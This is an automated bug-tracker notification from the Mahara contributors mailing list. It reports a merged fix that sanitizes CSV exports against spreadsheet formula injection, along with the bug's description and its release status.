mahara-contributors team mailing list archive

Thread
Date

[Bug 1930471] A change has been merged

To: mahara-contributors@xxxxxxxxxxxxxxxxxxx
From: Mahara Bot <1930471@xxxxxxxxxxxxxxxxxx>
Date: Thu, 28 Oct 2021 21:59:51 -0000
Reply-to: Bug 1930471 <1930471@xxxxxxxxxxxxxxxxxx>
Sender: noreply@xxxxxxxxxxxxx

Reviewed:  https://reviews.mahara.org/12197
Committed: https://git.mahara.org/mahara/mahara/commit/da329097ae4c5ec77703643e0f3b79db4fb9e596
Submitter: Robert Lyon (robertl@xxxxxxxxxxxxxxx)
Branch:    20.04_STABLE

commit da329097ae4c5ec77703643e0f3b79db4fb9e596
Author: Robert Lyon <robertl@xxxxxxxxxxxxxxx>
Date:   Thu Jun 3 12:20:23 2021 +1200

Security bug 1930471: Make exported CSV data safer

To avoid data exported from Mahara causing a CSV injection security
issue when imported in a spreadsheet program

Change-Id: Iedc258f33f1ca4e24fcb15f565da28828ef361ee
Signed-off-by: Robert Lyon <robertl@xxxxxxxxxxxxxxx>
(cherry picked from commit 941740b3f796316659d379819ffe7db93651df2e)
(cherry picked from commit 697a0c08dc3f0d433ec3941c84cc527e10962c0c)

-- 
You received this bug notification because you are a member of Mahara
Contributors, which is subscribed to Mahara.
Matching subscriptions: mahara-contributors
https://bugs.launchpad.net/bugs/1930471

Title:
  Exporting of CSV files needs to sanitize data

Status in Mahara:
  Fix Released
Status in Mahara 20.04 series:
  Fix Released
Status in Mahara 20.10 series:
  Fix Released
Status in Mahara 21.04 series:
  Fix Released

Bug description:
  When we export CSV files, like we do in the reports pages, we don't
  sanitize the output.

  This means if a person saves data (like their username) beginning with
  certain characters, eg = or  + etc then the data when added into a
  spreadsheet program will interpret the value as a command.

  This allows one to create a malicious string so that they can exploit
  spreadsheet vulnerabilities.

  Though this exploit isn't effecting Mahara itself - it can be the
  vector of transmission.

  It will be best if we sanitize the CSV exports to avoid this.
  A suggestion is to add a TAB character before any string that begins with a susceptible character

To manage notifications about this bug go to:
https://bugs.launchpad.net/mahara/+bug/1930471/+subscriptions